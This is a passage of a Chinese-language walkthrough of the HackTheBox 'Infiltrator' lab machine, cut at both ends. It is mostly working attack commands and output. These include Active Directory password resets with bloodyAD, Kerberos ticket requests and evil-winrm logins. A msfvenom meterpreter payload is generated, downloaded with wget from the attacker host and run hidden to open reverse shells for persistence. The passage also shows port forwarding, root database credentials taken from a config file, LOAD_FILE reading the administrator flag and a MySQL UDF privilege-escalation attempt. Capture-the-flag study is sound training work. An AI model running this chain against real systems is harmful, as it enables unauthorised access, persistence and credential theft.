set password "e.rodriguez" "QWEasd123@123"</span><br><span class="line"></span><br><span class="line">getTGT.py infiltrator.htb/e.rodriguez:"QWEasd123@123" -dc-ip dc01.infiltrator.htb</span><br><span class="line"></span><br><span class="line">export KRB5CCNAME=e.rodriguez.ccache</span><br><span class="line">python /opt/AD_tools/bloodyAD/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" --dc-ip 10.10.11.31 -u e.rodriguez -k add groupMember "CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTB" e.rodriguez</span><br><span class="line"></span><br><span class="line">python /opt/AD_tools/bloodyAD/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" --kerberos --dc-ip 10.10.11.31 -u "e.rodriguez" -p "QWEasd123@123" set password "m.harris" "QWEasd123@123"</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">getTGT.py infiltrator.htb/m.harris:'QWEasd123@123' -dc-ip dc01.infiltrator.htb</span><br><span class="line"></span><br><span class="line">KRB5CCNAME=m.harris.ccache evil-winrm -i dc01.infiltrator.htb -u m.harris -r infiltrator.htb</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>Logging in directly with the password,</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">evil-winrm -i dc01.infiltrator.htb -u m.harris -p "QWEasd123@123"</span><br></pre></td></tr></table></figure><p>does not work.<br>So use Kerberos auth instead: <code>KRB5CCNAME=m.harris.ccache</code> plus <code>-r infiltrator.htb</code>. Most likely the same account restriction that showed up as STATUS_ACCOUNT_RESTRICTION on SMB blocks password (NTLM) logons for this account, while a Kerberos ticket goes through.</p><h1 id="权限维持"><a href="#权限维持" class="headerlink" title="Persistence"></a>Persistence</h1><p>With everyone fighting over these passwords, I want a foothold that does not depend on them, so bring in msf:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td 
class="code"><pre><span class="line">msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.2 LPORT=9001 -f exe -o reverse.exe</span><br><span class="line">[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload</span><br><span class="line">[-] No arch selected, selecting arch: x64 from the payload</span><br><span class="line">No encoder specified, outputting raw payload</span><br><span class="line">Payload size: 510 bytes</span><br><span class="line">Final size of exe file: 7168 bytes</span><br><span class="line">Saved as: reverse.exe</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>本机用python起一个简单的http服务器 </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -m http.server 80</span><br></pre></td></tr></table></figure><p>然后用evil-winrm直接给他下载到目标机器,并在后台运行</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">wget http://10.10.16.2/reverse.exe -o reverse.exe</span><br><span class="line">Start-Process -FilePath "reverse.exe" -WindowStyle Hidden</span><br></pre></td></tr></table></figure><p>看到shell连回来,我才敢慢慢操作</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 10.10.16.2; set lport 9001; exploit -j"</span><br><span class="line">[*] Using configured payload generic/shell_reverse_tcp</span><br><span class="line">payload => 
windows/x64/meterpreter/reverse_tcp</span><br><span class="line">lhost => 10.10.16.2</span><br><span class="line">lport => 9001</span><br><span class="line">[*] Started reverse TCP handler on 10.10.16.2:9001 </span><br><span class="line">[*] Sending stage (201798 bytes) to 10.10.11.31</span><br><span class="line">[*] Meterpreter session 1 opened (10.10.16.2:9001 -> 10.10.11.31:63625) at 2024-09-06 10:57:03 -0400</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>这里我用了 -j<br>持续监听收shell<br>所以我可以在<code>evil-winrm</code>多运行几次<code>Start-Process -FilePath "reverse.exe" -WindowStyle Hidden</code><br>这样多搞几个进程,在打靶机时候不至于因为一个进程崩了,导致全部重来</p><p>在实际攻防中,拿下一个shell也要用多种方法维持权限,高危操作要用单独的进程操作,这里由于只是打靶机,我只是多搞了几个进程。</p><h1 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h1><p><a href="https://github.com/peass-ng/PEASS-ng">peass-ng/PEASS-ng: PEASS - Privilege Escalation Awesome Scripts SUITE (with colors) (github.com)</a></p><figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">start</span> /b winPEASx64.exe >> output.txt</span><br></pre></td></tr></table></figure><p>整理可能有用的东西</p><p>在进程列表里能看到OMServerService、outputmessenger_httpd、outputmessenger_mysqld比较显眼</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">TCP [::] 14118 [::] 0 Listening 7460 OMServerService</span><br><span class="line">TCP [::] 14122 [::] 0 Listening 7460 OMServerService</span><br><span class="line">TCP [::] 14123 [::] 0 Listening 4 System</span><br><span class="line">TCP [::] 14125 [::] 0 
Listening 4 System</span><br><span class="line">TCP [::] 14126 [::] 0 Listening 3396 outputmessenger_httpd</span><br><span class="line">TCP [::] 14127 [::] 0 Listening 7460 OMServerService</span><br><span class="line">TCP [::] 14128 [::] 0 Listening 7460 OMServerService</span><br><span class="line">TCP [::] 14130 [::] 0 Listening 7460 OMServerService</span><br><span class="line">TCP [::] 14406 [::] 0 Listening 5548 outputmessenger_mysqld</span><br><span class="line"></span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Output Messenger - MySQL(Output Messenger - MySQL)["C:\Program Files\Output Messenger Server\Plugins\Output\mysql\bin\outputmessenger_mysqld.exe" "--defaults-file=C:\Program Files\Output Messenger Server\Plugins\Output\mysql\my.ini" "OutputMessengerMySQL"] - Autoload</span><br><span class="line">Output Messenger - MySQL</span><br></pre></td></tr></table></figure><p>可以直接看到这个起了mysql的进程好像有点东西</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">C:\Users\M.harris>cd "C:\Program Files\Output Messenger Server\"</span><br><span class="line">cd "C:\Program Files\Output Messenger Server\" </span><br><span class="line">Access is denied. 
</span><br></pre></td></tr></table></figure><p>又没有权限</p><p>那就得找找他的文件了</p><p>能够自动,绝对不手动,msf冲冲冲</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">meterpreter > search -f "*Output Messenger Server*"</span><br><span class="line">Found 4 results...</span><br><span class="line">==================</span><br><span class="line"></span><br><span class="line">Path Size (bytes) Modified (UTC)</span><br><span class="line">---- ------------ --------------</span><br><span class="line">c:\ProgramData\Microsoft\Windows\Start Menu\Programs\Output Messenger\Output Messenger Server\Output Messenger Server Manager.lnk 1188 2024-02-25 10:35:07 -0500</span><br><span class="line">c:\ProgramData\Microsoft\Windows\Start Menu\Programs\Output Messenger\Output Messenger Server\Uninstall Output Messenger Server.lnk 1136 2024-02-19 10:41:20 -0500</span><br><span class="line">c:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Output Messenger\Output Messenger Server\Output Messenger Server Manager.lnk 1188 2024-02-25 10:35:07 -0500</span><br><span class="line">c:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Output Messenger\Output Messenger Server\Uninstall Output Messenger Server.lnk 1136 2024-02-19 10:41:20 -0500</span><br></pre></td></tr></table></figure><p>这似乎有点少,而且找到的都是快捷方式</p><p>如果是文件名,在windows上一般不会有空格隔开</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Output Messenger -> OutputMessenger</span><br></pre></td></tr></table></figure><p>再找找</p><figure class="highlight plaintext"><table><tr><td 
class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">meterpreter > search -f "*OutputMessenger*"</span><br><span class="line">Found 6 results...</span><br><span class="line">==================</span><br><span class="line"></span><br><span class="line">Path Size (bytes) Modified (UTC)</span><br><span class="line">---- ------------ --------------</span><br><span class="line">c:\Program Files\Output Messenger\OutputMessenger.exe 6826240 2023-10-23 16:41:12 -0400</span><br><span class="line">c:\Program Files\Output Messenger\OutputMessenger.exe.config 1788 2022-12-19 14:07:18 -0500</span><br><span class="line">c:\ProgramData\Output Messenger Server\Temp\OutputMessengerApache.zip 15702539 2024-02-19 10:51:30 -0500</span><br><span class="line">c:\ProgramData\Output Messenger Server\Temp\OutputMessengerMysql.zip 25477937 2024-02-19 10:51:52 -0500</span><br><span class="line">c:\Users\All Users\Output Messenger Server\Temp\OutputMessengerApache.zip 15702539 2024-02-19 10:51:30 -0500</span><br><span class="line">c:\Users\All Users\Output Messenger Server\Temp\OutputMessengerMysql.zip 25477937 2024-02-19 10:51:52 -0500</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>hh不亏是我<br>这里看到了一个<code>OutputMessenger.exe.config</code>,这一看就是要出货的节奏<br>如果不出结果只能下载那几个zip下来分析了</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span 
class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">meterpreter > cat "c:\Program Files\Output Messenger\OutputMessenger.exe.config"</span><br><span class="line"><?xml version="1.0" encoding="utf-8"?></span><br><span class="line"><configuration></span><br><span class="line"> <configSections></span><br><span class="line"> <section name="entityFramework" type="System.Data.Entity.Internal.ConfigFile.EntityFrameworkSection, EntityFramework, Version=6.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" requirePermission="false"/></span><br><span class="line"> </configSections></span><br><span class="line"> <runtime></span><br><span class="line"> <legacyCorruptedStateExceptionsPolicy enabled="false"/></span><br><span class="line"> </runtime></span><br><span class="line"> <startup useLegacyV2RuntimeActivationPolicy="true"></span><br><span class="line"> <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.0"/></span><br><span class="line"> </startup></span><br><span class="line"> <system.data></span><br><span class="line"> <DbProviderFactories></span><br><span class="line"> <clear/></span><br><span class="line"> <remove invariant="System.Data.SQLite"/></span><br><span class="line"> 
<add name="SQLite Data Provider" invariant="System.Data.SQLite" description="Data Provider for SQLite" type="System.Data.SQLite.SQLiteFactory, System.Data.SQLite"/></span><br><span class="line"> <remove invariant="System.Data.SQLite.EF6"/></span><br><span class="line"> <add name="SQLite Data Provider (Entity Framework 6)" invariant="System.Data.SQLite.EF6" description=".NET Framework Data Provider for SQLite (Entity Framework 6)" type="System.Data.SQLite.EF6.SQLiteProviderFactory, System.Data.SQLite.EF6"/></span><br><span class="line"> </DbProviderFactories></span><br><span class="line"> </system.data></span><br><span class="line"> <entityFramework></span><br><span class="line"> <defaultConnectionFactory type="System.Data.Entity.Infrastructure.SqlConnectionFactory, EntityFramework"/></span><br><span class="line"> <providers></span><br><span class="line"> <provider invariantName="System.Data.SqlClient" type="System.Data.Entity.SqlServer.SqlProviderServices, EntityFramework.SqlServer"/></span><br><span class="line"> <provider invariantName="System.Data.SQLite" type="System.Data.SQLite.EF6.SQLiteProviderServices, System.Data.SQLite.EF6"/></span><br><span class="line"> <provider invariantName="System.Data.SQLite.EF6" type="System.Data.SQLite.EF6.SQLiteProviderServices, System.Data.SQLite.EF6" /></span><br><span class="line"> </providers></span><br><span class="line"> </entityFramework></span><br><span class="line"></configuration></span><br><span class="line"></span><br></pre></td></tr></table></figure><p>Huh? SQLite usually isn't used over the network, and there is clearly an <code>OutputMessengerMysql.zip</code>, so that looks like the main target</p><p>Looks like I'll have to download the zip and take a look after all</p><p>While the zip downloads, I can also look around the <code>c:\Program Files\Output Messenger\</code> directory</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span 
class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br></pre></td><td class="code"><pre><span class="line">C:\Users\M.harris>dir "c:\Program Files\Output Messenger\"</span><br><span class="line">dir "c:\Program Files\Output 
Messenger\"</span><br><span class="line"> Volume in drive C has no label.</span><br><span class="line"> Volume Serial Number is 96C7-B603</span><br><span class="line"></span><br><span class="line"> Directory of c:\Program Files\Output Messenger</span><br><span class="line"></span><br><span class="line">02/23/2024 06:06 AM <DIR> .</span><br><span class="line">02/23/2024 06:06 AM <DIR> ..</span><br><span class="line">01/30/2021 02:03 PM 352 add_reinstall_prop.vbs</span><br><span class="line">04/07/2010 11:56 AM 106,496 antlr.runtime.dll</span><br><span class="line">01/30/2021 02:03 PM 15,186 Buzz.wav</span><br><span class="line">06/24/2022 02:13 PM 26,112 DDay.Collections.dll</span><br><span class="line">06/24/2022 02:13 PM 198,656 DDay.iCal.dll</span><br><span class="line">02/23/2024 06:06 AM <DIR> EmojiImg</span><br><span class="line">01/30/2021 02:03 PM 4,965,584 EntityFramework.dll</span><br><span class="line">01/30/2021 02:03 PM 595,152 EntityFramework.SqlServer.dll</span><br><span class="line">01/30/2021 02:03 PM 456,192 Hunspellx64.dll</span><br><span class="line">01/30/2021 02:03 PM 407,552 Hunspellx86.dll</span><br><span class="line">01/30/2021 02:03 PM 212,992 ICSharpCode.SharpZipLib.dll</span><br><span class="line">02/23/2024 06:06 AM <DIR> Languages</span><br><span class="line">08/26/2016 04:53 PM 24,064 LINQtoCSV.dll</span><br><span class="line">09/11/2020 01:59 PM 3,700 Login.wav</span><br><span class="line">09/11/2020 01:59 PM 3,534 Logout.wav</span><br><span class="line">02/23/2024 06:06 AM <DIR> MachineConfigFix</span><br><span class="line">09/11/2020 01:59 PM 16,450 Message.wav</span><br><span class="line">01/30/2021 02:03 PM 259,464 Microsoft.VisualBasic.PowerPacks.Vs.dll</span><br><span class="line">01/31/2020 06:02 PM 513,536 NAudio.dll</span><br><span class="line">06/22/2015 12:06 PM 510,976 Newtonsoft.Json.dll</span><br><span class="line">01/30/2021 02:03 PM 24,576 NHunspell.dll</span><br><span class="line">10/23/2023 01:40 PM 1,855,488 
NHunspellExtender.dll</span><br><span class="line">06/11/2021 07:07 PM 24,912 OM.AutoUpdate.exe</span><br><span class="line">10/23/2023 01:40 PM 12,288 OM.ChatCommands.dll</span><br><span class="line">10/23/2023 01:40 PM 95,232 OM.Client.dll</span><br><span class="line">10/23/2023 01:40 PM 195,584 OM.Common.dll</span><br><span class="line">10/23/2023 01:40 PM 11,776 OM.DragDrop.dll</span><br><span class="line">10/23/2023 01:40 PM 68,096 OM.File.dll</span><br><span class="line">11/09/2016 05:47 PM 8,704 OM.FileReader.dll</span><br><span class="line">10/23/2023 01:40 PM 645,632 OM.OMDB.dll</span><br><span class="line">10/23/2023 01:40 PM 142,336 OM.Packet.dll</span><br><span class="line">10/23/2023 01:40 PM 195,072 OM.Plugin.dll</span><br><span class="line">10/23/2023 01:40 PM 218,624 OM.RD.dll</span><br><span class="line">10/23/2023 01:40 PM 297,472 OM.Snip.dll</span><br><span class="line">04/24/2021 12:11 PM 65,536 OM.Tab.dll</span><br><span class="line">10/23/2023 01:40 PM 19,968 OM.User.dll</span><br><span class="line">10/23/2023 01:41 PM 6,826,240 OutputMessenger.exe</span><br><span class="line">12/19/2022 12:07 PM 1,788 OutputMessenger.exe.config</span><br><span class="line">02/23/2024 06:06 AM <DIR> Plugins</span><br><span class="line">09/12/2020 03:04 PM 156,522 RING.WAV</span><br><span class="line">02/23/2024 06:06 AM <DIR> SpellCheck</span><br><span class="line">01/30/2021 02:03 PM 275,968 System.Data.SQLite.dll</span><br><span class="line">01/30/2021 02:03 PM 183,808 System.Data.SQLite.EF6.dll</span><br><span class="line">01/30/2021 02:03 PM 183,808 System.Data.SQLite.Linq.dll</span><br><span class="line">07/19/2016 02:53 PM 191,152 System.Net.Http.dll</span><br><span class="line">02/23/2024 06:06 AM <DIR> TeamTalk</span><br><span class="line">04/09/2022 11:38 AM 5,941,072 TeamTalk5Pro.dll</span><br><span class="line">04/09/2022 11:38 AM 128,512 TeamTalk5Pro.NET.dll</span><br><span class="line">02/23/2024 06:06 AM 33,424 unins000.dat</span><br><span 
class="line">02/23/2024 06:06 AM 724,224 unins000.exe</span><br><span class="line">02/23/2024 06:06 AM 11,401 unins000.msg</span><br><span class="line">02/23/2024 06:06 AM <DIR> x64</span><br><span class="line">02/23/2024 06:06 AM <DIR> x86</span><br><span class="line"> 45 File(s) 26,855,213 bytes</span><br><span class="line"> 10 Dir(s) 46,407,237,632 bytes free</span><br></pre></td></tr></table></figure><p>I rummaged through a few of the directories and found nothing useful; I hope the downloaded zip isn't just the same stuff I've just been looking at</p><p>Extracting OutputMessengerMysql.zip turns up something good</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">└─$ cat OutputMysql.ini </span><br><span class="line">[SETTINGS]</span><br><span class="line">SQLPort=14406</span><br><span class="line">Version=1.0.0</span><br><span class="line"></span><br><span class="line">[DBCONFIG]</span><br><span class="line">DBUsername=root</span><br><span class="line">DBPassword=ibWijteig5</span><br><span class="line">DBName=outputwall</span><br><span class="line"></span><br><span class="line">[PATHCONFIG]</span><br><span class="line">;mysql5.6.17</span><br><span class="line">MySQL=mysql</span><br><span class="line">Log=log</span><br><span class="line">def_conf=settings</span><br><span class="line">MySQL_data=data</span><br><span class="line">Backup=backup</span><br></pre></td></tr></table></figure><p>This root couldn't be the real root, could it? If so, I'm going straight for it</p><p>Now I need to forward that internal port to my local machine</p><figure class="highlight plaintext"><table><tr><td 
class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">portfwd add -l 53366 -L 0.0.0.0 -p 14406 -r 10.10.11.31</span><br></pre></td></tr></table></figure><p>Honestly, msf makes lab boxes comfortable. Without msf, tunnelling tools such as chisel, frp or nps would do the job here</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mysql -h 127.0.0.1 -uroot -P 53366 -p</span><br></pre></td></tr></table></figure><p>Seeing DBName=outputwall above, I can confirm I now have access to the database</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">MariaDB [(none)]> show databases;</span><br><span class="line">+--------------------+</span><br><span class="line">| Database |</span><br><span class="line">+--------------------+</span><br><span class="line">| information_schema |</span><br><span class="line">| mysql |</span><br><span class="line">| outputwall |</span><br><span class="line">| performance_schema |</span><br><span class="line">+--------------------+</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span 
class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">MariaDB [outputwall]> show tables;</span><br><span class="line">+---------------------------+</span><br><span class="line">| Tables_in_outputwall |</span><br><span class="line">+---------------------------+</span><br><span class="line">| ot_attachment |</span><br><span class="line">| ot_comments |</span><br><span class="line">| ot_entity |</span><br><span class="line">| ot_entity_accounts |</span><br><span class="line">| ot_entity_daysoff |</span><br><span class="line">| ot_entity_setting |</span><br><span class="line">| ot_sessions |</span><br><span class="line">| ot_user_notification_read |</span><br><span class="line">| ot_user_notifications |</span><br><span class="line">| ot_wall_activity |</span><br><span class="line">| ot_wall_favorite |</span><br><span class="line">| ot_wall_notification |</span><br><span class="line">| ot_wall_posts |</span><br><span class="line">| ot_wall_tagmessages |</span><br><span class="line">| ot_wall_tags |</span><br><span class="line">| ot_wall_tokens |</span><br><span class="line">| ot_wall_usermessages |</span><br><span class="line">+---------------------------+</span><br><span class="line">17 rows in set (0.869 sec)</span><br><span class="line"></span><br><span class="line">MariaDB [outputwall]> SELECT LOAD_FILE('C:\\Users\\Administrator\\Desktop\\root.txt');</span><br><span class="line">+----------------------------------------------------------+</span><br><span class="line">| 
LOAD_FILE('C:\\Users\\Administrator\\Desktop\\root.txt') |</span><br><span class="line">+----------------------------------------------------------+</span><br><span class="line">| 6c25a2e506000ffc77da4fbc0ee3a032</span><br><span class="line"> |</span><br><span class="line">+----------------------------------------------------------+</span><br><span class="line">1 row in set (0.870 sec)</span><br></pre></td></tr></table></figure><p>我确定了,这是真root,都可以读Administrator的flag了<br>如果是打工,或者是做什么der项目,估计到这里我就下班了</p><p>但是,这么nb的靶机肯定还有东西没教我,东西没学到怎能撤退</p><p>#mysql #查看安装路径</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">MariaDB [outputwall]> select @@basedir;</span><br><span class="line">+----------------------------------------------------------------+</span><br><span class="line">| @@basedir |</span><br><span class="line">+----------------------------------------------------------------+</span><br><span class="line">| C:\Program Files\Output Messenger Server\Plugins\Output\mysql\ |</span><br><span class="line">+----------------------------------------------------------------+</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>#mysql #udf </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">msf6 
exploit(multi/mysql/mysql_udf_payload) > exploit </span><br><span class="line"></span><br><span class="line">[*] Started reverse TCP handler on 10.10.16.2:4444 </span><br><span class="line">[*] 127.0.0.1:53366 - Checking target architecture...</span><br><span class="line">[*] 127.0.0.1:53366 - Checking for sys_exec()...</span><br><span class="line">[*] 127.0.0.1:53366 - Checking target architecture...</span><br><span class="line">[*] 127.0.0.1:53366 - Checking for MySQL plugin directory...</span><br><span class="line">[*] 127.0.0.1:53366 - Target arch (win32) and target path both okay.</span><br><span class="line">[*] 127.0.0.1:53366 - Uploading lib_mysqludf_sys_32.dll library to C:/Program Files/Output Messenger Server/Plugins/Output/mysql/lib/plugin/yQUJZIok.dll...</span><br><span class="line">[-] 127.0.0.1:53366 - MySQL Error: Mysql::ServerError Can't create/write to file 'C:\Program Files\Output Messenger Server\Plugins\Output\mysql\lib\plugin\yQUJZIok.dll' (Errcode: 2 "No such file or directory")</span><br><span class="line">[-] 127.0.0.1:53366 - MySQL Error: Mysql::ServerError::CantOpenLibrary Can't open shared library 'yQUJZIok.dll' (errno: 2, The specified module could not be found.</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>怀疑是没传上去,手动试试</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">MySQL 5.6 对应 MariaDB 10.0</span><br><span class="line">MySQL 5.7 对应 MariaDB 10.2</span><br></pre></td></tr></table></figure><p>而我现在用的是</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span 
class="line">MariaDB [outputwall]> select version();</span><br><span class="line">+-----------------+</span><br><span class="line">| version() |</span><br><span class="line">+-----------------+</span><br><span class="line">| 10.1.19-MariaDB |</span><br><span class="line">+-----------------+</span><br><span class="line">1 row in set (0.901 sec)</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>udf提权在Mysql >= 5.1 时,需要在那个<code>lib\plugin</code>路径下<br>就是说我得先创建这个路径,然后再传</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">C:\Users\M.harris>dir "C:/Program Files/Output Messenger Server/Plugins/"</span><br><span class="line">dir "C:/Program Files/Output Messenger Server/Plugins/"</span><br><span class="line"> Volume in drive C has no label.</span><br><span class="line"> Volume Serial Number is 96C7-B603</span><br><span class="line"></span><br><span class="line"> Directory of C:\Program Files\Output Messenger Server\Plugins</span><br><span class="line"></span><br><span class="line">File Not Found</span><br></pre></td></tr></table></figure><p>看来完整的靶机体验肯定有udf提权,大概吧</p><p><a href="https://book.hacktricks.xyz/v/cn/network-services-pentesting/pentesting-mysql#windows">3306 - Pentesting Mysql | HackTricks</a></p><p>可以用这个命令来进行udf提权,其中需要先把<code>lib_mysqludf_sys.dll</code>上传到目标机器,这个dll在msf的目录里可以直接找到,也有现成模块mysql_udf_payload用,但是刚刚失败了</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span 
